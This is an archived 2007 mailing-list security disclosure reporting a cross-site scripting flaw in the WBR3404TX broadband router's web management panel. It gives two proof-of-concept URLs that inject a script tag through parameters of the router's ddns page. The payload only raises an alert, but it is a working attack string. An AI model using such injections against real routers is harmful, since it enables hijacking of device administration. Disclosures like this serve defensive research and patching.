Hosting Provided By

WBR3404TX Broadband Router XSS

From: <azizov(at)itdefence.ru>
Date: Wed Sep 19 2007 - 13:37:21 EDT

I.Overview
Current firmware version is R1.94p0vTIG (*the latest). WBR3404TX Broadband Router Web Management

II.Description
http://[routeraddress]/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=%22%3E%3Cscript%3Ealert('xss%20detected!');%3C/script%3E%3Ctext%20id=%22&DU=&DW= http://[routeraddress]/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=&DU=%22%3E%3Cscript%3Ealert('xss%20detected!');%3C/script%3E%3Ctext%20id=%22&DW=

Open to XSS atacks via the web management panel. Received on Wed Sep 19 15:07:02 2007

This message: [ Message body ]
Next message: Mehrad1989(at)gmail.com: "PHPBBPLUS 1.5.3 RFI BUG"
Previous message: administrator(at)toms-seiten.at: "Re: Re: Re: Toms Gstebuch 1.00 - XSS"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:16:19 EDT